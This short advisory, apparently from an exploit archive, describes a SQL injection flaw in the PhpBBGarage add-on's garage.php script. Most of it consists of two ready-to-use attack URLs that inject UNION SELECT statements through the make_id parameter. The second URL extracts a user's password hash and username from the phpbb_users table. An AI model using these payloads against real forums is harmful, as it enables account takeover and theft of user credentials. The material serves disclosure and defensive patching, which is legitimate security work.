PhpBBGarage Garage.PHP SQL Injection Vulnerability

PhpBBGarage Garage.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following URIs are available:

http://www.example.com/garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*
http://www.example.com/garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*